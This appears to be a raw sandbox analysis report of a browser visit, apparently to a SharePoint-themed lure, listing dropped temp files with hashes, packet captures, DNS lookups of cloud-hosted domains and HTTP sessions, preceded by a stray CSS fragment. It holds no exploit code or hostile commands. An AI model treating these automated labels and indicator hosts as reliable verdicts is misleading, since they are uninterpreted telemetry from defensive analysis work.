format("woff2"),url("/wp-content/themes/chimera-framework-2017/fonts/ubuntu/ubuntu-bold-webfont.woff") format("woff");font-weight:700;font-style:normal}@font-face{font-fam

C:\Users\user\AppData\Local\Temp\~DF366A8B049B54D2CF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25441
Entropy (8bit):	0.2886346466812713
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAOh:kBqoxxJhHWSVSEab
MD5:	03AE76C0C9BFD59E3DC39675BD645867
SHA1:	DFBDD484C746E7EB0FECF971B3D782857ED3958B
SHA-256:	454C94FB62FE4797841C5AAD0D61982164DCBC8BA46055B0CA5B3600C6AD7AAB
SHA-512:	27B212D16287382C18B78332B0930B6F24006C9A6FF22962E01660B2E5AC80DDC419A190B28D7F1AC8AE5FD411EDCD87DA02EBD37218757E4879A91DEB42AC8E
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE3365AA569982C87.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13029
Entropy (8bit):	0.48111487241197126
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9locsF9locM9lWc524ELe:kBqoIg+e24ELe
MD5:	C83B8D52C00C0B6DBE5CC37FC5456862
SHA1:	78970F45ACA4CD62DF0CA1D1213DD68560009008
SHA-256:	1A7A87914FA6E4B3231BE4ED29A158D55AEF09FA6DBB9BA8D91692DE8496D50B
SHA-512:	2627EA5CFC008E2F486569967A9EE68E9B37573A457E7E8CD0A542F61C261C6CF4F3595316D68E475ED45895BC61B2709152CD31B4D037F6F2D217831F34A55C
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF335FDC517C7DD21.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	68670
Entropy (8bit):	1.798946834110297
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR++4y7oaC+Eg1J3S4CvybMEg1J3SkJb1J3Sfb9bGJbCobGbe3bUbUbq:kWT
MD5:	0AC927FA0A6BE4B02E4EFAE30511CF49
SHA1:	BB80C81BF0E0A3C7AAE133A6B51C49F573C004EF
SHA-256:	D1D21B7ECE7EA3A12908A35E8A930E7EFCEDCC806C374EAD5D78B698FEEE5155
SHA-512:	4700FFEBDE3665C59593E64E2AA3616B7DE2B1FC0A17B2049B60459D29868ACA5C8544A77FB8D4C4251401C8AA8BE008EB041643FDDEA4210D309F42EF7DF2FA
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 09:35:06.172120094 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.172962904 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.307065010 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.307180882 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.308063030 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.308159113 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.312534094 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.312721014 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.446502924 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.448605061 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.455080986 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.455157995 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.455171108 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.455223083 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.455224991 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.455401897 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.459342957 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.459387064 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.459434032 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.459484100 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.459525108 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.459528923 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.490125895 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.490235090 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.496081114 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.624243021 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.626343012 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.626980066 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.627136946 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.627862930 CET	443	49709	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:06.627991915 CET	49709	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:06.668519020 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:07.200268030 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:07.200320959 CET	443	49710	169.46.89.154	192.168.2.3
Nov 27, 2020 09:35:07.200475931 CET	49710	443	192.168.2.3	169.46.89.154
Nov 27, 2020 09:35:07.290980101 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.291017056 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.319289923 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.319335938 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.319399118 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.319473982 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.320523024 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.321521997 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.348301888 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.349220991 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.356271029 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.356326103 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.356374979 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.356401920 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.356466055 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.358016014 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.358061075 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.358099937 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.358103991 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.358131886 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.361955881 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.365164995 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.365730047 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.370621920 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.392985106 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.393495083 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.394530058 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.394593000 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.398286104 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.399656057 CET	443	49711	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.399772882 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.431061983 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.431094885 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.431113958 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.431145906 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.431176901 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.601221085 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.602142096 CET	49711	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.609184980 CET	49713	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.610289097 CET	49714	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.611280918 CET	49715	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.637094975 CET	443	49713	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.637200117 CET	49713	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.637809038 CET	49713	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.638016939 CET	443	49714	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.638088942 CET	49714	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.638971090 CET	443	49715	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.639036894 CET	49715	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.639595032 CET	49714	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.640353918 CET	49715	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.641716003 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.641798019 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.641808987 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.641850948 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.641866922 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.641889095 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.641913891 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.641915083 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.641953945 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.641958952 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.641983986 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.641984940 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.642011881 CET	443	49712	158.175.115.200	192.168.2.3
Nov 27, 2020 09:35:07.642014980 CET	49712	443	192.168.2.3	158.175.115.200
Nov 27, 2020 09:35:07.642025948 CET	49712	443	192.168.2.3	158.175.115.200

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 09:34:59.445457935 CET	60152	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:34:59.481069088 CET	53	60152	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:00.267914057 CET	57544	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:00.295382023 CET	53	57544	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:01.351325035 CET	55984	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:01.387202024 CET	53	55984	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:02.346365929 CET	64185	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:02.373718023 CET	53	64185	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:05.037230015 CET	65110	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:05.074316978 CET	53	65110	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:06.122234106 CET	58361	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:06.163305998 CET	53	58361	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:07.223597050 CET	63492	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:07.269464970 CET	53	63492	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:09.463114023 CET	60831	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:09.490502119 CET	53	60831	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:22.492989063 CET	60100	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:22.520359993 CET	53	60100	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:24.883518934 CET	53195	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:25.022957087 CET	53	53195	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:25.687370062 CET	50141	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:25.714653969 CET	53	50141	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.233500957 CET	53023	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.240931988 CET	49563	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.251822948 CET	51352	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.277003050 CET	53	53023	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.284549952 CET	53	49563	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.295339108 CET	53	51352	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.319230080 CET	59349	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.346265078 CET	53	59349	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.497162104 CET	57084	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.519740105 CET	58823	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.524307966 CET	53	57084	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.546917915 CET	53	58823	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.825555086 CET	57568	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.852499962 CET	53	57568	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.928837061 CET	50540	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.964292049 CET	53	50540	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:26.977401972 CET	54366	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:26.997586012 CET	53034	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:27.012873888 CET	53	54366	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:27.033106089 CET	53	53034	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:27.225205898 CET	57762	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:27.252271891 CET	53	57762	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:27.256732941 CET	55435	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:27.283902884 CET	53	55435	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:27.443958044 CET	50713	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:27.470974922 CET	53	50713	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:29.339585066 CET	56132	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:29.375216961 CET	53	56132	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:30.530241966 CET	58987	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:30.557636023 CET	53	58987	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:31.365341902 CET	56579	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:31.392554998 CET	53	56579	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:32.274616957 CET	60633	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:32.312094927 CET	53	60633	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:35.038151026 CET	61292	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:35.065362930 CET	53	61292	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:35.738348961 CET	63619	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:35.765605927 CET	53	63619	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:36.036782026 CET	61292	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:36.074824095 CET	53	61292	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:36.739186049 CET	63619	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:36.774946928 CET	53	63619	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:37.047555923 CET	61292	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:37.083184958 CET	53	61292	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:37.750796080 CET	63619	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:37.786672115 CET	53	63619	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:38.693928957 CET	64938	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:38.721050978 CET	53	64938	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:39.055373907 CET	61292	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:39.090964079 CET	53	61292	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:39.496481895 CET	61946	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:39.525657892 CET	53	61946	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:39.758539915 CET	63619	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:39.786434889 CET	53	63619	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:40.167310953 CET	64910	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:40.194442987 CET	53	64910	8.8.8.8	192.168.2.3
Nov 27, 2020 09:35:41.640644073 CET	52123	53	192.168.2.3	8.8.8.8
Nov 27, 2020 09:35:41.667705059 CET	53	52123	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2020 09:35:06.122234106 CET	192.168.2.3	8.8.8.8	0xedc9	Standard query (0)	mincast.us-south.cf.appdomain.cloud	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:07.223597050 CET	192.168.2.3	8.8.8.8	0x7152	Standard query (0)	j123.eu-gb.cf.appdomain.cloud	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:09.463114023 CET	192.168.2.3	8.8.8.8	0xdcdd	Standard query (0)	icons.iconarchive.com	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:22.492989063 CET	192.168.2.3	8.8.8.8	0x5cc3	Standard query (0)	icons.iconarchive.com	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:24.883518934 CET	192.168.2.3	8.8.8.8	0x37ba	Standard query (0)	www.premierpawn.com	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:26.977401972 CET	192.168.2.3	8.8.8.8	0x422	Standard query (0)	stats.g.doubleclick.net	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:26.997586012 CET	192.168.2.3	8.8.8.8	0xdd7	Standard query (0)	connect.facebook.net	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.225205898 CET	192.168.2.3	8.8.8.8	0xafb9	Standard query (0)	www.google.co.uk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2020 09:35:06.163305998 CET	8.8.8.8	192.168.2.3	0xedc9	No error (0)	mincast.us-south.cf.appdomain.cloud		169.46.89.154	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:06.163305998 CET	8.8.8.8	192.168.2.3	0xedc9	No error (0)	mincast.us-south.cf.appdomain.cloud		169.62.254.82	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:06.163305998 CET	8.8.8.8	192.168.2.3	0xedc9	No error (0)	mincast.us-south.cf.appdomain.cloud		169.47.124.25	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:07.269464970 CET	8.8.8.8	192.168.2.3	0x7152	No error (0)	j123.eu-gb.cf.appdomain.cloud		158.175.115.200	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:07.269464970 CET	8.8.8.8	192.168.2.3	0x7152	No error (0)	j123.eu-gb.cf.appdomain.cloud		141.125.73.152	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:07.269464970 CET	8.8.8.8	192.168.2.3	0x7152	No error (0)	j123.eu-gb.cf.appdomain.cloud		158.176.79.200	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:09.490502119 CET	8.8.8.8	192.168.2.3	0xdcdd	No error (0)	icons.iconarchive.com		172.67.212.166	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:09.490502119 CET	8.8.8.8	192.168.2.3	0xdcdd	No error (0)	icons.iconarchive.com		104.18.58.50	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:09.490502119 CET	8.8.8.8	192.168.2.3	0xdcdd	No error (0)	icons.iconarchive.com		104.18.59.50	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:22.520359993 CET	8.8.8.8	192.168.2.3	0x5cc3	No error (0)	icons.iconarchive.com		172.67.212.166	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:22.520359993 CET	8.8.8.8	192.168.2.3	0x5cc3	No error (0)	icons.iconarchive.com		104.18.58.50	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:22.520359993 CET	8.8.8.8	192.168.2.3	0x5cc3	No error (0)	icons.iconarchive.com		104.18.59.50	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:25.022957087 CET	8.8.8.8	192.168.2.3	0x37ba	No error (0)	www.premierpawn.com	premierpawn.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 09:35:25.022957087 CET	8.8.8.8	192.168.2.3	0x37ba	No error (0)	premierpawn.com		149.56.20.211	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.012873888 CET	8.8.8.8	192.168.2.3	0x422	No error (0)	stats.g.doubleclick.net	stats.l.doubleclick.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 09:35:27.012873888 CET	8.8.8.8	192.168.2.3	0x422	No error (0)	stats.l.doubleclick.net		74.125.128.155	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.012873888 CET	8.8.8.8	192.168.2.3	0x422	No error (0)	stats.l.doubleclick.net		74.125.128.156	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.012873888 CET	8.8.8.8	192.168.2.3	0x422	No error (0)	stats.l.doubleclick.net		74.125.128.154	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.012873888 CET	8.8.8.8	192.168.2.3	0x422	No error (0)	stats.l.doubleclick.net		74.125.128.157	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.033106089 CET	8.8.8.8	192.168.2.3	0xdd7	No error (0)	connect.facebook.net	scontent.xx.fbcdn.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 09:35:27.033106089 CET	8.8.8.8	192.168.2.3	0xdd7	No error (0)	scontent.xx.fbcdn.net		31.13.92.14	A (IP address)	IN (0x0001)
Nov 27, 2020 09:35:27.252271891 CET	8.8.8.8	192.168.2.3	0xafb9	No error (0)	www.google.co.uk		216.58.215.227	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

icons.iconarchive.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49716	172.67.212.166	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2020 09:35:09.516598940 CET	278	OUT	GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: icons.iconarchive.com Connection: Keep-Alive
Nov 27, 2020 09:35:09.552840948 CET	280	IN	HTTP/1.1 200 OK Date: Fri, 27 Nov 2020 08:35:09 GMT Content-Type: image/png Content-Length: 9159 Connection: keep-alive Set-Cookie: __cfduid=d7eb16b95148e3cf626e501729a40ba461606466109; expires=Sun, 27-Dec-20 08:35:09 GMT; path=/; domain=.iconarchive.com; HttpOnly; SameSite=Lax Last-Modified: Sat, 27 Jun 2020 10:27:29 GMT ETag: "5ef71f11-23c7" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2951 Accept-Ranges: bytes cf-request-id: 06aa7098570000bdd261bf6000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tApyZdnCxqkn3p6%2B8gNcrTdzAWfyeVXgMl%2BZPt3hGl7zWPFao7Pt1rsi9SezgJ6bG1zGA1DzJVBBc5qX%2BKHcK9%2Fo9H1Qes7DM7Y4IlAhB5GYibOL8DE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 5f8a83a08caabdd2-AMS Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 23 8e 49 44 41 54 78 da ed 9d 09 7c 14 e5 dd c7 7f b3 49 08 09 f7 2d 67 c2 25 67 08 5a c5 b3 5e b5 2a 4a 36 10 50 6c 6d fb b6 56 49 02 b4 96 c4 83 57 5b 6d 7d eb ab 08 04 aa 90 6c b4 d6 7a 1f 15 25 89 da 4a 45 eb ab 8b 82 58 a0 a0 78 70 85 4b 6e e4 ca b9 bb f3 fe 9f 3d 34 62 80 3c bb b3 3b 33 cf fc bf 9f cf ec 6e 36 79 66 9e 79 32 cf 77 9e 67 e6 ff 3c a3 81 61 18 c7 a2 99 9d 01 86 61 cc 83 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 30 0e 86 05 c0 9c 9a 22 6f 3b 7a cd 80 e6 1a 0e e8 a3 e8 b0 19 05 5f 7d 0f 7c b5 63 1c 9e b8 61 af d9 d9 63 a2 87 05 c0 7c 9b 22 6f 77 7a ed 0f 4d 1b 41 ef a3 69 19 09 1d 83 e8 bd 27 2d c9 c1 bf d1 e8 b0 f1 d5 1f 25 01 0c 24 01 ec 31 3b cb 4c f4 b0 00 9c 4a b1 37 99 2a 76 6f 3a 04 06 d3 4f 23 e8 48 c8 a6 9f 47 42 54 7e a0 eb 49 d3 86 04 b0 9f 04 30 9c 05 60 6f 58 00 4e a0 d8 9b 0e 5d ef 07 b8 86 05 9b ef d0 b3 e8 db a1 10 cd 7a a0 ad f4 fa 58 00 ca c0 02 50 8d 62 6f 17 3a 93 67 d2 bf 96 fa eb c1 26 bc a8 ec a2 09 4f 67 7b b4 32 64 1b 2c 00 65 60 01 d8 95 62 af 8b 5e 7b 51 65 1f 48 ff 46 d1 74 a7 33 7b b0 b2 0f a0 a5 47 5c b7 cd 02 50 06 16 80 1d b8 d5 db 1a 01 f4 85 68 b6 6b 54 c9 75 d1 8c 0f 36 e1 45 7f bd 7d c2 f3 c3 02 50 06 Data Ascii: PNGIHDR\rf#IDATx\|I-g%gZ^J6PlmVIW[m}lz%JEXxpKn=4b<;3n6yfy2wg<aa0000000000000000"o;z_}\|cac\|"owzMAi'-%$1;LJ7vo:O#HGBT~I0`oXN]zXPbo:g&Og{2d,e`b^{QeHFt3{G\PhkTu6E}P

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49718	172.67.212.166	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2020 09:35:22.545556068 CET	290	OUT	GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1 User-Agent: AutoIt Host: icons.iconarchive.com If-Modified-Since: Sat, 27 Jun 2020 10:27:29 GMT If-None-Match: "5ef71f11-23c7" Cookie: __cfduid=d7eb16b95148e3cf626e501729a40ba461606466109
